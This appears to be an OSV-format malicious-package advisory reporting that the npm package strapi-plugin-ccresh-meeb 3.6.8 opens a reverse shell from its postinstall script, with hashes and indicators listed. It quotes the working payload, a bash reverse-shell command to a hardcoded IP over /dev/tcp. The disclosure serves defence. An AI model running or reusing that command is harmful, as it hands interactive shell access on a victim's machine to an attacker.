{"id":"MAL-2026-16180","summary":"Malicious code in strapi-plugin-ccresh-meeb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797)\nThe package's postinstall lifecycle script (`scripts.postinstall: node postinstall.js`) unconditionally invokes `/bin/bash` with an interactive reverse-shell payload at install time: `bash -c 'bash -i \u003e /dev/tcp/14.225.210.85/443 0\u003e&1'`. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a `Reverse shell payload for Strapi`. Any `npm install` of this package results in remote code execution and interactive shell access as the installing user.\n","modified":"2026-09-15T16:31:25.434560124Z","published":"2026-09-15T15:52:37Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-09-15T15:52:37Z","sha256":"5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797","source":"amazon-inspector","versions":["3.6.8"],"id":"IN-MAL-2026-020045","import_time":"2026-09-15T16:19:13.733654239Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/strapi-plugin-ccresh-meeb/v/3.6.8"}],"affected":[{"package":{"name":"strapi-plugin-ccresh-meeb","ecosystem":"npm","purl":"pkg:npm/strapi-plugin-ccresh-meeb"},"versions":["3.6.8"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"ae11cb4166f9673562338ddde60b942ba3474e05703ae517b98c03171ec6c8cc5426fd","path":"postinstall.js","sha256":"dfa7478eb73161feed4ab606f488ee08eda7efe631fb5fc3b1a78367d4f52ad4"},{"path":"package.json","sha256":"3a8553e38980c3bbc8feefcc09bdd662ac3c5075b992ab0f15105f7d81c38d34","tlsh":"c9d0a7148a119333bdc4679d1823820bab719e071415f82c27f71148024bbfb9c7b35f"}],"package_integrity":[{"filename":"strapi-plugin-ccresh-meeb-3.6.8.tgz","hashes":{"sha1":"0a38b1f93e23d1a7188cbc0ebb3976330ccb6416","sha512_sri":"sha512-mbufN4JprRF1qe7nBqnnlqrSHG03dyx4IKM0SigPfqYq1O333rglPczZdoUATY/h/+bydC9A7ogVUr2YOM/PPw=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccresh-meeb/MAL-2026-16180.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}